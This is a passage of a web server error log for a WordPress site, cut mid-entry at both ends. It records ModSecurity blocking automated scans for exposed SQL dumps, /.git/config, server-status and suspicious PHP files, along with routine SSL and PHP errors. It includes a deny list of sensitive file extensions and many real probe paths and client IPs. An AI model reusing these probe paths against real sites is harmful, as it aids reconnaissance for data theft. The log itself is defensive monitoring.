.vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/reserv.sql"] [unique_id "ZQxAacVt1Z376aPWyum8yQAAAMg"] [Thu Sep 21 12:32:21.433625 2023] [:error] [pid 25656:tid 139706956179200] [client 173.52.121.16:39490] [client 173.52.121.16] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/res.sql"] [unique_id "ZQx-Je5M7QHYRGY0w7J49QAAAJg"] [Thu Sep 21 15:05:15.132527 2023] [:error] [pid 25656:tid 139707023320832] [client 179.43.191.18:42602] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Sep 21 15:05:25.463816 2023] [:error] [pid 25654:tid 139707231770368] [client 179.43.191.18:42616] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Sep 21 16:49:52.386608 2023] [:error] [pid 26293:tid 139707048498944] [client 81.94.73.180:45018] [client 81.94.73.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/r.sql"] [unique_id "ZQy6gMVt1Z376aPWyunAyAAAAM0"] 2023/09/21 19:23:55 [error] 25646#25646: *72016 access forbidden by rule, client: 91.201.115.115, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 21 21:12:01.546829 2023] [:error] [pid 25655:tid 139707189806848] [client 182.215.164.33:49730] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/b.sql"] [unique_id "ZQz38YSacs3CGFM8T4r4LAAAAEU"] [Fri Sep 22 01:37:09.513633 2023] [:error] [pid 25654:tid 139707040106240] [client 14.48.28.154:54524] [client 14.48.28.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/school.sql"] [unique_id "ZQ02FfdAKBFR2Vqg3wK2xQAAAA4"] [Fri Sep 22 03:23:31.300661 2023] [ssl:warn] [pid 32035:tid 139837066258304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 03:23:37.513108 2023] [ssl:warn] [pid 32037:tid 139837066258304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 03:23:37.947992 2023] [ssl:warn] [pid 32037:tid 139837066258304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 03:23:41.010286 2023] [ssl:warn] [pid 32037:tid 139837066258304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 03:23:43.335798 2023] [ssl:warn] [pid 32453:tid 139867134064512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 03:23:47.501211 2023] [ssl:warn] [pid 32454:tid 139867134064512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 06:06:22.376177 2023] [:error] [pid 32473:tid 139866909357824] [client 109.90.121.217:59190] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/restore.sql"] [unique_id "ZQ11LjZ8oYRnaFJSoBy9BQAAAIU"] [Fri Sep 22 10:40:17.323714 2023] [:error] [pid 32472:tid 139866708846336] [client 118.163.251.59:35680] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db.sql"] [unique_id "ZQ21YZHP0wcKzq0QUajQ7wAAAFQ"] [Fri Sep 22 15:14:50.297668 2023] [:error] [pid 32473:tid 139866708846336] [client 61.70.88.59:40504] [client 61.70.88.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "ZQ31ujZ8oYRnaFJSoBy_fgAAAJQ"] [Fri Sep 22 19:04:09.046514 2023] [ssl:warn] [pid 32454:tid 139867134064512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 22 19:38:59.499886 2023] [:error] [pid 3185:tid 139866817951488] [client 109.90.121.217:46316] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/data.sql"] [unique_id "ZQ4zo3u-SJJA1NPE8QZ0zgAAAEc"] [Fri Sep 22 21:40:48.310279 2023] [:error] [pid 3326:tid 139866734024448] [client 198.71.236.29:48112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: http://simplesite.com [Fri Sep 22 22:36:48.169093 2023] [authz_core:error] [pid 3326:tid 139866750809856] [client 172.104.102.196:48794] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/22 22:36:53 [error] 3146#3146: *90101 access forbidden by rule, client: 172.104.102.196, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Sep 22 22:38:53.448754 2023] [authz_core:error] [pid 3185:tid 139866817951488] [client 46.101.103.192:48844] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/22 22:38:57 [error] 3146#3146: *90152 access forbidden by rule, client: 46.101.103.192, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Sep 23 00:03:13.663609 2023] [:error] [pid 3326:tid 139866767595264] [client 185.162.16.58:50712] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dat.sql"] [unique_id "ZQ5xkViWq16HbcKQv0bzswAAAM0"] [Sat Sep 23 01:02:08.104438 2023] [authz_core:error] [pid 3326:tid 139866909357824] [client 46.101.103.192:52290] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/23 01:02:12 [error] 3145#3145: *92293 access forbidden by rule, client: 46.101.103.192, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 23 03:01:46.538433 2023] [:error] [pid 3184:tid 139866700453632] [client 83.229.85.81:54108] [client 83.229.85.81] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "ZQ6baphOXOV1Z-pRg_EqLAAAABU"] [Sat Sep 23 03:30:26.739584 2023] [ssl:warn] [pid 17372:tid 139893027944320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 23 03:30:30.918991 2023] [ssl:warn] [pid 17374:tid 139893027944320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 23 03:30:31.366816 2023] [ssl:warn] [pid 17374:tid 139893027944320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 23 03:30:33.388494 2023] [ssl:warn] [pid 17374:tid 139893027944320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 23 03:30:35.668358 2023] [ssl:warn] [pid 17793:tid 139664076736384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 23 03:30:37.833936 2023] [ssl:warn] [pid 17794:tid 139664076736384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 23 04:32:14.555878 2023] [:error] [pid 18442:tid 139663628998400] [client 173.52.121.16:55858] [client 173.52.121.16] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/123456.sql"] [unique_id "ZQ6wngOqyU-gQ_FWHHrP1QAAANc"] [Sat Sep 23 04:37:38.261911 2023] [autoindex:error] [pid 17818:tid 139663645783808] [client 54.37.121.239:55948] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sat Sep 23 13:31:13.603426 2023] [:error] [pid 17819:tid 139663704532736] [client 182.215.164.33:37046] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/12345678.sql"] [unique_id "ZQ8u8R2jjrovRq8O7GP5dwAAAI4"] [Sat Sep 23 17:57:00.326761 2023] [:error] [pid 17818:tid 139663687747328] [client 208.102.168.75:40492] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/qwerty.sql"] [unique_id "ZQ9tPI1xHfTxWsfRiZCTQAAAAFA"] [Sat Sep 23 21:55:45.679867 2023] [:error] [pid 18442:tid 139663721318144] [client 194.246.93.218:44196] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Sat Sep 23 21:55:45.679942 2023] [:error] [pid 18442:tid 139663721318144] [client 194.246.93.218:44196] Stack trace: [Sat Sep 23 21:55:45.679953 2023] [:error] [pid 18442:tid 139663721318144] [client 194.246.93.218:44196] #0 {main} [Sat Sep 23 21:55:45.680022 2023] [:error] [pid 18442:tid 139663721318144] [client 194.246.93.218:44196] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Sat Sep 23 22:23:56.777193 2023] [:error] [pid 18442:tid 139663679354624] [client 118.163.251.59:44760] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/123456789.sql"] [unique_id "ZQ-rzAOqyU-gQ_FWHHrXuwAAANE"] [Sat Sep 23 22:40:34.469987 2023] [autoindex:error] [pid 18442:tid 139663746496256] [client 192.185.81.220:44988] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Sun Sep 24 02:54:14.886628 2023] [:error] [pid 17817:tid 139663729710848] [client 211.196.38.227:49636] [client 211.196.38.227] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/12345.sql"] [unique_id "ZQ_rJm3kXNksV8wXAbOBwQAAAAs"] [Sun Sep 24 03:34:17.805698 2023] [ssl:warn] [pid 23641:tid 140542655719296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 24 03:34:21.976689 2023] [ssl:warn] [pid 23647:tid 140542655719296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 24 03:34:22.398447 2023] [ssl:warn] [pid 23647:tid 140542655719296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 24 03:34:24.683391 2023] [ssl:warn] [pid 23647:tid 140542655719296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 24 03:34:27.044031 2023] [ssl:warn] [pid 24138:tid 140325301081984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 24 03:34:31.227174 2023] [ssl:warn] [pid 24139:tid 140325301081984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 24 07:28:13.040677 2023] [:error] [pid 24158:tid 140324911384320] [client 109.90.121.217:54146] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1234.sql"] [unique_id "ZRArXQgvYoJhgJ5go0rPkgAAAJA"] [Sun Sep 24 12:00:24.641697 2023] [:error] [pid 25052:tid 140324936562432] [client 61.70.88.59:57266] [client 61.70.88.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/111111.sql"] [unique_id "ZRBrKIV7ImWRwMERyHjBsAAAAM0"] [Sun Sep 24 16:29:01.236795 2023] [:error] [pid 